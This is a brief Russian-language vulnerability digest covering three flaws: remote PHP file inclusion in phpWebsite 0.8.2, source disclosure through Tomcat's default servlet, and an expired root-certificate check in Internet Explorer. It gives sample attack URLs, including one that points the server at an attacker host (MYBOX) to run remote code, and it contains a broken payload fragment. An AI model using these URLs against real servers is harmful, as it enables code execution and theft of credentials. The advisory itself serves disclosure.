Внедрение произвольного PHP кода в phpWebsite 0.8.2
Уязвимость, обнаруженная в phpWebsite,позволяет включать произвольный удаленный PHP файл в include_once.php сценарий. Уязвимость позволяет атакующему выполнять произвольные команды на Web сервере. Пример:

http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/

--- htmlheader.php --- " ?> .

Раскрытие исходного кода сценариев в Apache Tomcat
Сервлет "org.apache.catalina.servlets.DefaultServlet" включен в Apache Tomcat по умолчанию. Удаленный атакующий может использовать этот сервлет для просмотра содержания произвольных файлов в пределах WWWROOT, в т.ч. и .jsp файлов, которые могут содержать чувствительные данные, типа имен пользователей базы данных и паролей. Пример:

http://target/admin/servlet/org.apache.catalina.servlets.DefaultServlet/target.jsp

Уязвимость обнаружена в Apache Software Foundation Tomcat 3.0-4.1.10

Уязвимость проверки срока действия сертификата в Microsoft Internet Explorer
Уязвимость обнаружена в PKI, используемом Microsoft Internet Explorer для SSL. По сообщениям, браузер не предупреждает пользователя, если срок действия root CA сертификата истек. Это происходит, когда браузер имеет более новую версию CA сертификата. Вероятно уязвимость может лежать операционной системе, а не Internet Explorer. В этом случае, могут быть уязвимы и другие приложения.Уязвимость обнаружена в 5.5-6.0 sp1